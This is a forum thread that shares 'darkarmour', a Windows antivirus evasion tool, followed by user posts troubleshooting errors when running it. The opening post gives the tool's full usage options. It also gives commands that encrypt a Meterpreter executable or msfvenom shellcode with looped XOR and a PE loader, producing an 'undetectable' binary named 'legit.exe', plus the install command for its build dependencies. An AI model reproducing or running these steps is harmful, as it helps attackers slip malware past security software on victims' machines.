dEEpEst Posted January 20, 2020

Windows AV Evasion Tool

Store and execute an encrypted Windows binary from inside memory, without a single bit touching disk.

Usage

    By Dylan Halls | Version 0.3

    usage: darkarmour.py [-h] [-f FILE] -e ENCRYPT [-S SHELLCODE] [-b] [-d] [-u] [-j] [-r] [-s] [-k KEY] [-l LOOP] [-o OUTFILE]

    optional arguments:
      -h, --help            show this help message and exit
      -f FILE, --file FILE  file to crypt, assumed as binary if not told otherwise
      -e ENCRYPT, --encrypt ENCRYPT
                            encryption algorithm to use (xor)
      -S SHELLCODE, --shellcode SHELLCODE
                            file contating the shellcode, needs to be in the 'msfvenom -f raw' style format
      -b, --binary          provide if file is a binary exe
      -d, --dll             use reflective dll injection to execute the binary inside another process
      -u, --upx             pack the executable with upx
      -j, --jmp             use jmp based pe loader
      -r, --runpe           use runpe to load pe
      -s, --source          provide if the file is c source code
      -k KEY, --key KEY     key to encrypt with, randomly generated if not supplied
      -l LOOP, --loop LOOP  number of levels of encryption
      -o OUTFILE, --outfile OUTFILE
                            name of outfile, if not provided then random filename is assigned

Generate an undetectable version of a pe executable:

    ./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5

Execute shellcode (x86/64) inside memory without detection, just provide the raw shellcode:

    ./darkarmour.py -S -f bins/meter.bin --encrypt xor --jmp -o bins/legit.exe --loop 5

Installation

It uses the Python stdlib, so there is no need to worry about any Python dependencies; the only issues you could come across are binary dependencies. The required binaries are: i686-w64-mingw32-g++, i686-w64-mingw32-gcc and upx (probably osslsigncode soon as well). These can all be installed via apt:

    sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode

TODO

    Integrate into PowerUp
    Optional signing of binaries
    Load pe image over a socket so it is not stored inside the binary
yarshi Posted January 24, 2020

While running the generated exe, a console opens and shows "Unable to call PE,likely thats invalid", and if using the runpe option it gives an error:

    Traceback (most recent call last):
      File "1.py", line 116, in <module>
        darkarmour.run(vars(ap.parse_args()))
      File "1.py", line 96, in run
        self._do_crypt()
      File "1.py", line 91, in _do_crypt
        if self.runpe:
    AttributeError: 'DarkArmour' object has no attribute 'runpe'
0x1 Posted January 26, 2020

Don't use the option --runpe (it is null), use --jump.
yarshi Posted January 30, 2020

On 1/27/2020 at 6:28 AM, 0x1 said:
    Don't use the option --runpe (it is null), use --jump.

Still getting the same error with your commands too... and yeah, I used --jmp, not the pe ones. If the pe ones are used it gives an error, and the --jmp ones compile successfully but are unable to run; this error came while running the binary output: "Unable to call PE,likely thats invalid"
0x1 Posted January 31, 2020

Problem with the code, try to contact the developer.

Quote: darkarmour/blob/master/src/jmp_loader/main.c

Maybe the error is because the PE is different to image_base.

int main() :
yarshi Posted February 1, 2020

On 1/31/2020 at 3:59 PM, 0x1 said:
    Problem with the code, try to contact the developer.
    Maybe the error is because the PE is different to image_base.
    int main() :

Yeah, looks like the same to me... will try to see if I can get in contact with the developer.